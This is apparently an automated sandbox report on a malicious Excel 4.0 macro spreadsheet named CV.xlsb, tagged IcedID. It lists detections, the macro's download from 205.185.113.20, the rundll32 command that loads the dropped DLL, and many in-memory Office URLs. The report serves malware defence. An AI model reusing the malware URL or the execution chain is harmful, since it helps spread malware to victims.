Loading ...

Play interactive tourEdit tour

Analysis Report CV.xlsb

Overview

General Information

Sample Name:CV.xlsb
Analysis ID:319185
MD5:97978d78a96b89671a7bcb1325ae9ed2
SHA1:7d3c43d1d8d4657ce177126bbae27647b9e02ee2
SHA256:3cbc9397d35ec1de513c7d7f747fb6b7773d468244b06bbfc60b4325f1e1b22b
Tags:IcedIDmacroxlsx

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5980 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6084 cmdline: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5980, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer, ProcessId: 6084

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://205.185.113.20/BVd1qKwdVirustotal: Detection: 10%Perma Link
Source: http://205.185.113.20/BVd1qKwdVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: CV.xlsbReversingLabs: Detection: 12%
Source: CV.xlsbReversingLabs: Detection: 12%

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
Source: global trafficTCP traffic: 192.168.2.3:49713 -> 205.185.113.20:80
Source: global trafficTCP traffic: 192.168.2.3:49713 -> 205.185.113.20:80
Source: global trafficTCP traffic: 192.168.2.3:49713 -> 205.185.113.20:80
Source: global trafficTCP traffic: 192.168.2.3:49713 -> 205.185.113.20:80
Source: Joe Sandbox ViewIP Address: 205.185.113.20 205.185.113.20
Source: Joe Sandbox ViewIP Address: 205.185.113.20 205.185.113.20
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Nov 2020 03:50:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveCache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0Expires: 0Last-Modified: Wed, 18 Nov 2020 03:50:23 GMTPragma: no-cacheSet-Cookie: _subid=1m9efdt1oal;Expires=Saturday, 19-Dec-2020 03:50:23 GMT;Max-Age=2678400;Path=/Vary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Nov 2020 03:50:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveCache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0Expires: 0Last-Modified: Wed, 18 Nov 2020 03:50:23 GMTPragma: no-cacheSet-Cookie: _subid=1m9efdt1oal;Expires=Saturday, 19-Dec-2020 03:50:23 GMT;Max-Age=2678400;Path=/Vary: Accept-Encoding
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.aadrm.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.office.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.onedrive.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://augloop.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://autodiscover-s.outlook.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.entity.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://config.edge.skype.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cortana.ai
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cr.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://devnull.onenote.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://directory.services.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.windows.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.windows.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://lifecycle.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.local
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://management.azure.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://management.azure.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://messaging.office.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officeapps.live.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://settings.outlook.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://tasks.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.aadrm.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.office.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.onedrive.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://augloop.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://autodiscover-s.outlook.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.entity.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
